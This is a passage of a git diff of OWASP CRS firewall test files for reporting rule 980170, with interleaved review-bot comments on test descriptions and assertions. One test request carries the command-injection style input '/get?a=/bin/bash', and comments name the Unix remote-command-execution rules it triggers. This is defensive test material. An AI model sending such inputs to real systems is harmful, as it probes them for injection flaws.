+ output: + log: + match_regex: 'Outbound Anomaly Score Exceeded \(Total Score: ' diff --git a/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/RESPONSE-980-CORRELATION/980170.yaml index df07008..027c14d 100644 --- a/tests/RESPONSE-980-CORRELATION/980170.yaml +++ b/tests/RESPONSE-980-CORRELATION/980170.yaml 
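Review bot: Test 2's desc calls 953120-1 the "PHP leakage negative test in phase 4", but in the 953120 hunk earlier in this diff test 1 is the positive case ("Just something that returns …") and the negative-sounding one is test 2, so the reference and the phrase disagree. Tests 2 and 3 also still cite other tests by the old `953120-1`/`959100-1` title form that this commit replaces with `test_id`; if the runner no longer reports that form, `desc: Test is basically identical to 953120 test 2 …` would be clearer. The new `match_regex: 'Outbound Anomaly Score Exceeded \(Total Score: '` looks like a faithful translation of the old `[(]` escape given single-quoted YAML.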
@@ -1,78 +1,77 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "980170.yaml" description: | Test whether level 4 inbound reporting in phase 5 works by testing whether rule 980170 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the corresponding reporting rules to be triggered. +rule_id: 980170 tests: - - test_title: 980170-1 + - test_id: 1 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that was blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # Will match rules - # - 920273: restricted characters violation - # - 920350: numeric IP in Host header - # - 932160: Unix remote command execution - # - 932236: Unix command injection - # - 932260: Unix remote command execution - uri: "/get?a=/bin/bash" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. 
- retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # Will match rules + # - 920273: restricted characters violation + # - 920350: numeric IP in Host header + # - 932160: Unix remote command execution + # - 932236: Unix command injection + # - 932260: Unix remote command execution + uri: "/get?a=/bin/bash" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + expect_ids: [980170] + - test_id: 2 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - # Will match rule 920350: numeric IP in Host header - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. 
- retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + # Will match rule 920350: numeric IP in Host header + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + expect_ids: [980170] + - test_id: 3 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - no_log_contains: "id \"980170\"" + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + no_expect_ids: [980170] diff --git a/version.go b/version.go index 3877f36..e922ad0 100644 --- a/version.go +++ b/version.go 
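Review bot: The descriptions of test_id 1 ("a request is logged that was blocked") and test_id 2 ("scored but was not blocked") promise two different outcomes, yet both stages assert only `expect_ids: [980170]`, so a regression in which the request is no longer blocked (or is blocked when it should merely score) still passes. If the test target blocks at the default anomaly thresholds, adding a response-code assertion next to the `log:` block — `status: 403` for test 1 and `status: 200` for test 2 — would pin the distinction the desc claims; I am inferring the blocked outcome of test 1 from the comment listing the five matched rules rather than from the assertions themselves. Test 3's `no_expect_ids: [980170]` already checks the non-scoring case and needs no change.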
@@ -7,6 +7,6 @@ package main
 const (
- crsVersion = "v4.4.0"
+ crsVersion = "v4.5.0"
 corazaVersion = "v3.2.1"
 )